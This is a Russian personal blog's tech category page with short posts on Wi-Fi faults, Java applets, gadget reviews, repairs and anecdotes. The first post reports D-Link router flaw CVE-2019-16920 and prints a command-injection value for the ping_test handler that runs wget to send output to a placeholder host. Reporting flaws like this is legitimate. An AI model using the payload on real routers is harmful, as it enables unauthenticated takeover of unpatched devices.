Category: техника

Category was added automatically. Read all entries about "техника".

фига

Уязвимость в массовых роутерах D-Link нескольких моделей. Исправлять не будут.

В беспроводных маршрутизаторах D-Link выявлена опасная уязвимость (CVE-2019–16920), позволяющая удалённо выполнить код на стороне устройства через отправку специального запроса к обработчику "ping_test", доступному без прохождения аутентификации.

Интересно, что по задумке разработчиков прошивки вызов "ping_test" должен выполняться только после аутентификации, но на деле он вызывается в любом случае, независимо от входа в web-интерфейс. В частности, при обращении к скрипту apply_sec.cgi с передачей параметра "action=ping_test", скрипт перебрасывает на страницу аутентификации, но при этом выполняет связанное с ping_test действие. Для выполнения кода использована ещё одна уязвимость в самом ping_test, который вызывает утилиту ping без должной проверки корректности переданного для тестирования IP-адреса. Например, для вызова утилиты wget и передачи на внешний хост результатов выполнения команды "echo 1234" достаточно указать параметр "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://test.test/?$(echo 1234)".

Наличие уязвимости официально подтверждено в моделях:

  • DIR-655 с прошивкой 3.02b05 или старее;
  • DIR-866L с прошивкой 1.03b04 или старее;
  • DIR-1565 с прошивкой 1.01 или старее;
  • DIR-652 (данных о версиях проблемных прошивок не приводится)
Время сопровождения данных моделей уже истекло, поэтому компания D-Link заявила, что не будет выпускать для них обновления с устранением уязвимости, не рекомендует использовать и советует заменить на новые устройства. В качестве обходного пути защиты можно ограничить доступ к web-интерфейсу только для заслуживающих доверия IP-адресов.

Позднее выяснилось, что уязвимость также затрагивает модели DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 и DIR-825, о планах по выпуску обновлений для которых пока ничего не известно.

Отсюда
по этому материалу

Оригинал этого поста в Dream Width. Если вы там есть - отвечайте там, уже комментариев: comment count unavailable

фига

Ну вот скажите, это мне пора сдаваться в дурку, или мирозданию в целом? :)

На экране в браусере открыт вконтактик - единственное место, где у меня системно выключен блокиратор рекламы, ибо глючит интерфейс и логин при включенном.

В процессе возни на кухне пришло в голову перекрутить шуруп один на кухне с места на место чтобы кастрюли висели лучше. Взял шуруповёрт. Перекрутил.


Запнулся в прихожей за кроссовки младшего ребёнка. Переставил их. При возвращении к компу вижу:


И при мелькнувшей отчётливой мысли об уборке через 17 минут реклама плавно замещается вот такой:


Сабж.

Оригинал этого поста в Dream Width. Если вы там есть - отвечайте там, уже комментариев: comment count unavailable

ветка

Мамы и дети. Прогулка без гаджетов, просто так.

1. Идут навстреча мама с дочкой. У мамы на футболке надпись "DON'T WORRY", у дочки - "be happy".
2. Автомобильная дорога, пешеходный переход. Взрослая кошка и котёнок. Кошка ЯВНО УЧИТ котёнка пересекать автомобильную дорогу, в том числе "вместе с людьми".

Оригинал этого поста в Dream Width. Если вы там есть - отвечайте там, уже комментариев: comment count unavailable

фига

Немного о платформе "Окружная" Савёловского направления

1. Примерно 1984 год. Я поднимаюсь по лестнице на платформу Окружная и вижу на одном из столбов, что на мосту через МКЖД, яркую вспышку. После чего электричка, которая в этот момент стоит у платформы, в течение минут 3-х никуда не едет.

2. Примерно тогда же, другой день. Стою на платформе. В той же точке, что в первый раз вижу существенного размера (диаметр - примерно в половину ширины металлической фермы под провода), яркую шаровую молнию. Она чуть мерцает и шевелится, и её ШОРОХ доносится до меня сквозь шум едущих внизу машин. Через некоторое время с шипением гаснет.

Платформу перенесли, и теперь головной вагон в область останавливается вот ровно на этом самом мосту через ранее МКЖД, а ныне - через пути МЦК.

3. Сегодня, 2019 год. 9:10-9:19 утра. Я выхожу на платформу и вижу, что:

3.1. Висящие на этом конце платформы электронные табло не работают, причём "в москву" жестоко глючит. Картинка на светодиодном табло такая, как обычно ожидаешь от разбитого ЖКИ или от картинки с пересыпающимся песком.

3.2. Я достаю сотовый и медленно иду к этим табло. На моих глазах заряд аккума падает с ~87% до ~10-12. Причём когда я отхожу обратно - скорость падения заряда резко уменьшается. Через малое время телефон погас и перестал включаться с этим аккумом. Я счёл разумным вытащить аккум, а поставил другой уже сев в электричку и уехав с этого милого места.

3.3. Когда в 9:19 я вошёл во второй вагон нужной мне электрички, я услышал несколько реплик пассажиров относительно того, как вот прям щас вдруг стали глючить их телефоны.

Оригинал этого поста в Dream Width. Если вы там есть - отвечайте там, уже комментариев: comment count unavailable

фига

Проблемы с WiFi с одним конкретным ноутбуком... :)

Есть у меня дома WiFi сеть
WPA/WPA2-PSK (от этого параметра набор эффектов не зависит никак)
TKIP шифрование (от этого параметра набор эффектов не зависит никак)
802.11g/n (от этого параметра набор эффектов ЧАСТИЧНО зависит)
канал 6 (от этого параметра набор эффектов не зависит никак)

Есть несколько устройств, которые к ней подключаются. Android, W7, XPSP3
В том числе нормально работающий нетбук XP SP3 с так же установленными обновлениями, без "спецэффектов".

Есть конкретный ноутбук, XP SP3 (со всеми обновлениями) со "спецэффектом":
Если на этот ноутбук по сети начать копировать по сети с сервера достаточно большой файл (хватает 250М мультфильма), то с некоторой весьма большой вероятностью процесс останавливается в состоянии "не могу прочитать файл", и после WiFi часть сети не работает.

"не работает" - то есть:
1. любой, кто пытается подключаться с логином и паролем к этой WiFi сети, получает один из трёх результатов:
-- "ошибка авторизации" беспроводного соединения
-- Присоединился, не смог получить адрес по DHCP
-- Присоединился, получил адрес, в течение 4-20 секунд беспроводное соединение разорвалось
2. Если на соотв. интерфейсе роутера сменить SSID сетки (тем самым проблемный ноут отваливается)
-- все устройства присоединяются с новыми ssid/key
-- всё работает нормально
-- Если вернуть прежний ssid/key, не трогая проблемного ноута - наступает пункт 1.
3. Если проблемный ноут выключить или перезагрузить - проблема пропадает.
4. ребуты, изменения конфигурации прочих устройств (в том числе роутера), ЗАМЕНА роутера (точнее - подключение альтернативной точки доступа) НЕ меняют состояния 1.
5. Проводные устройства ничего не замечают, "лишних" пакетиков в проводной части сети не детектится.

UPD: Intel PRO/Wireless 2200BG VEN_8086 DEV_4220 SUBSYS_27018086 REV_05
драйвер Intel 2004 года, версия 8.1.0.26

Оригинал этого поста в Dream Width. Если вы там есть - отвечайте там, уже комментариев: comment count unavailable

фига

Знатокам Явы вопрос

Есть сайт 2001 года или старше.
Апплеты на нём.
Если добавить сайт в список исключений Явы по безопасности - то всё равно Error - Click for Details и на клик вот такое сообщение:
Java Applet blocked
жать Ignore не помогает.

Принимаются предложения от опытных Яваводов:
- посетителю такого сайта (трёх ипостасей:
-- с телефона/планшета
-- c виндового компа
-- линуксовому )
- вебмастеру такого сайта

пример такой странички - http://my.arcto.ru/public/statement.html

Оригинал этого поста в Dream Width. Если вы там есть - отвечайте там, уже комментариев: comment count unavailable

фига

Идея насчёт микроноутбука... И про Windows 1OS

В эпоху 3д-принтеров странная мысль возникла.

Карманный "микроноут" с клавой а-ля Sigmarion 3:
берём следующие компоненты:
- телефон сотовый.
- BT клава
- PowerBank

клаву и павербанк - в нижнюю часть ноута.
телефон - в верхнюю.

На 3D принтере печатается "чехол верхней части" и "чехол нижней части"
из металла - два шарнира.
К ним снизу - проводки плюс и минус от павербанка.
От них в верхнюю часть чехла - провод к гнезду зарядки телефона.

В итоге получится что-то типа Sigmarion 3, чуть толще, конечно.
В корпусе должны быть КАРМАШКИ под симки и карточки разного формата.
Опционально - USB хаб (но не так удобно, когда он в верхней части).

Услуга вида "мы соберём для вас микронооутбук из ЛЮБОГО вашего телефона" - печать на 3д принтере в присутствии заказчика. Проводки и шарниры ессно типовые.

Нищеброды в качестве павербанка и груза будут применять AA батарейки. :)

UPD: Возможно, не все меня поняли, потому отвечаю сразу по нескольким увиденным комментам. Отличия описанной мной идеи от имеющегося в продаже:

1. Все имеющиеся "чехлы с клавами", что я наблюдаю в продаже к конкретным девайсам - сравнительно МЯГКИЕ. Практически все - с торчащими так или иначе проводами. В данной же конструкции речь о ЖЁСТКОМ, складывающемся "мягкими частями внутрь" и "проводами внутрь" аппарате.
2. Речь идёт именно о том, чтобы делать "на месте" конструкцию под произвольный комплект "планшет+клава+павербанк", а не "искать по алиэкспрессу то, что подходит под мои железки".
3. Говоря "телефон" - я лично в данном случае считаю таковыми "телефонами" всё то, что называется планшетами и-или телефонами и-или смартфонами с тачскрином и экраном в почти всю площадь "морды". Вне зависимости от точного размера (ибо функционально сейчас это в самом деле одно и то же).

И чтоб два раза не вставать - написанное название новой операционной системы микрософта правильно читается как "Windows One Os" (и аббревиатура неплоха - WOO!) а не как "Windows ten S" и не как "Windows tense" (время Виндоус!)

Оригинал этого поста в Dream Width. Если вы там есть - отвечайте там, уже комментариев: comment count unavailable

фига

Asus Transformer - впечатления от железки.

Принесли мне тут Asus Trnsformer
~ноября 2015 года покупки, 2 гига RAM. 30Gb SSD, windows 10.
  1. Механически ОЧЕНЬ ПЛОХ как планшет - предельно неудачно расположены кнопки, нет способа держать одной рукой, не задевая за что-то существенное.
  2. Механически ОЧЕНЬ ПЛОХ как "нивротуебук" - экран перевешивает, аппарат надо или держать рукой, когда он стоит на столе, или снабжать подставкой.
  3. Клавиатурная нижняя часть ОЧЕНЬ хлипкая, взяв его за один угол, я вижу, как он гнётся в состояние "щас скоро захрустит".
  4. Как ноутбук - разъём питания есть ТОЛЬКО в ВЕРХНЕЙ части экрана. И это микроусб. То есть когда аккумы подохнут - работать станет ЖУТКО неудобно.
  5. Разъёмы микро-hdmi, micro-usb и ещё какой-то третий выглядят одинаково, НЕ подписаны, два расположэены совсем рядом. На экранной части, ессно.
  6. гнездо микросд сделано так, что край карточки НЕ утоплен, и можно выщелкнуть карточку, просто нажав мягким пальцем на торчащий выступающий на примерно 2мм край карточки
  7. SSD забито автообновлениями системы (1.5 гига свободно), ессно винда тормозит бешено. Винда 64 бита. На 2 гигах. Ага. Попробуйте выключить свопинг, попробуйте обойтись без гибернейта!
  8. В ипостаси ноутбука в настоящее время нижняя часть периодически отваливается - то есть просто пропадает курсор мыши и реакция на кнопки клавиатуры. Помогает закрыть-открыть ноутбук

Оригинал этого поста в Dream Width. Если вы там есть - отвечайте там, уже комментариев: comment count unavailable

фига

Бездна голодных гаджетов (БГГ) и советы мастеру...

Из опыта починки механических устройств:

Сантехнический лён как армировка в эпоксидку

Он, мало того, то прочный - он цеплючий. :)

последовательность починки головки гитарного колка:

  1. зачистил поверхность штырька
  2. капнул эпоксидкой на него
  3. несколькими волокнами начал обматывать
  4. часть льна обмакнул в эпоксидку и как следует пропитал ею
  5. намотал плотно
  6. остатки эпоксидки слил в формочку из непрочного материала
  7. засунул в эту формочку сверху намотанное со штырьком
  8. оставил на сутки застывать
  9. после застывания раскурочил формочку и напильником опилил лишнее
Cамое сложное в этом всём - не капнуть мимо и не извазюкаться. Для меня, по крайней мере. :)

И чтобы два раза не вставать...

Бездна голодных гаджетов (БГГ)

Звонит клиентка. Починить ноутбук, "Так как он не включается!".
  1. Оказывается, она потеряла от него зарядку
  2. При попытке уточнить марку ноутбука:
    • ну тут две буквы Д и У"
    • Русские буквы или латинские?"
    • Латинские! Точно латинские. - тут я лихорадочно пытаюсь понять, что это за du
    • А если перевернуть ноутбук?
    • А. Ой, да, я его перевёрнутым держу. Это hp в кружочке!

Оригинал этого поста в Dream Width. Если вы там есть - отвечайте там, уже комментариев: comment count unavailable

фига

Windows 10. Порошок "Белая Галактика", "Аквариумы"...

ВСЕ 16 из 16 владельцев ноутбуков, ранее купленных и-или настроенных мной для них,
которые проапдейтились на 10-ку, через примерно неделю-полторы после оного апдейта названивают мне
с ДОСЛОВНО одинаковым вопросом, произносимым "как будто читают по бумажке":
"Что-то винда тормозит, может мне и в самом деле стоит новый ноутбук купить, уже с десяткой?"

Сегодня, в ОДИН день, позвонили два из этих 16-ти,
причём апдейт до 10-ки они также совершили в один день.

Да, да, всё это совпадения. Чисто случайно я проходила мимо и увидела продающийся порошок "Белая Галактика"...